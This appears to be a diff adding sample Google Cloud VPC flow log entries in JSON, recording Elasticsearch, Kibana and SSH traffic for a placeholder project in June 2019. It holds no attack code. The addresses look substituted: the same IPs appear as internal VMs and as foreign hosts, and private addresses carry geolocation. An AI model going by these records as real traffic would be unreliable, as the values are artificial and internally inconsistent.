+{"insertId":"198begsfh44xy5","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"67.43.156.14","dest_port":14236,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:09.257387426Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.247072525Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.291787305Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.291787305Z"}
+{"insertId":"19im82tfdygznq","jsonPayload":{"bytes_sent":"64427","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33542},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"351","reporter":"DEST","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzn6","jsonPayload":{"bytes_sent":"183366","connection":{"dest_ip":"10.87.40.76","dest_port":33690,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"242","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznk","jsonPayload":{"bytes_sent":"185295","connection":{"dest_ip":"10.87.40.76","dest_port":33562,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznm","jsonPayload":{"bytes_sent":"68961","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":49438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"711","reporter":"DEST","rtt_msec":"114","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzob","jsonPayload":{"bytes_sent":"62072","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-proje
ct","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygznc","jsonPayload":{"bytes_sent":"198326","connection":{"dest_ip":"10.87.40.76","dest_port":33590,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygznj","jsonPayload":{"bytes_sent":"61436","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzo5","jsonPayload":{"bytes_sent":"66791","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"355","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzod","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":54812},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzna","jsonPayload":{"bytes_sent":"64466","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_
name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzng","jsonPayload":{"bytes_sent":"174524","connection":{"dest_ip":"10.87.40.76","dest_port":33968,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"66","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzo1","jsonPayload":{"bytes_sent":"181624065","connection":{"dest_ip":"10.49.136.133","dest_port":52780,"protocol":6,"src_ip":"67.43.156.13","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"28344","reporter":"DEST","rtt_msec":"91","src_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzo8","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.168.2.117","src_port":51348},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzoa","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.168.2.12","dest_port":44128,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"end_time":"2019-06-14T03:45:22.081121292Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzn7","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"95","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"75801985
4043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygznf","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.14","dest_port":54812,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzni","jsonPayload":{"bytes_sent":"21792","connection":{"dest_ip":"67.43.156.13","dest_port":33564,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"186","reporter":"SRC","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzns","jsonPayload":{"bytes_sent":"74370","connection":{"dest_ip":"67.43.156.13","dest_port":49438,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"580","reporter":"SRC","rtt_msec":"114","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygznp","jsonPayload":{"bytes_sent":"138337","connection":{"dest_ip":"10.87.40.76","dest_port":33550,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-projec
t","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzo9","jsonPayload":{"bytes_sent":"30062","connection":{"dest_ip":"192.168.2.177","dest_port":60110,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"124","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzo3","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":51348,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygznz","jsonPayload":{"bytes_sent":"152218","connection":{"dest_ip":"67.43.156.13","dest_port":33560,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"243","reporter":"SRC","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetw
ork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzo4","jsonPayload":{"bytes_sent":"143085","connection":{"dest_ip":"67.43.156.13","dest_port":33510,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"249","reporter":"SRC","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygznt","jsonPayload":{"bytes_sent":"61245","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"356","reporter":"DEST","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygznu","jsonPayload":{"bytes_sent":"65919","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"361","reporter":"DEST","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
+{"insertId":"19im82tfdygzo6","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"67.43.156.14","dest_port":41822,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:40.058368408Z","packets_sent":"4","reporter":"SRC","rtt_msec":"1439","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
+{"insertId":"19im82tfdygzno","jsonPayload":{"bytes_sent":"188997","connection":{"dest_ip":"67.43.156.13","dest_port":33532,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"251","reporter":"SRC","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwo
rk_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
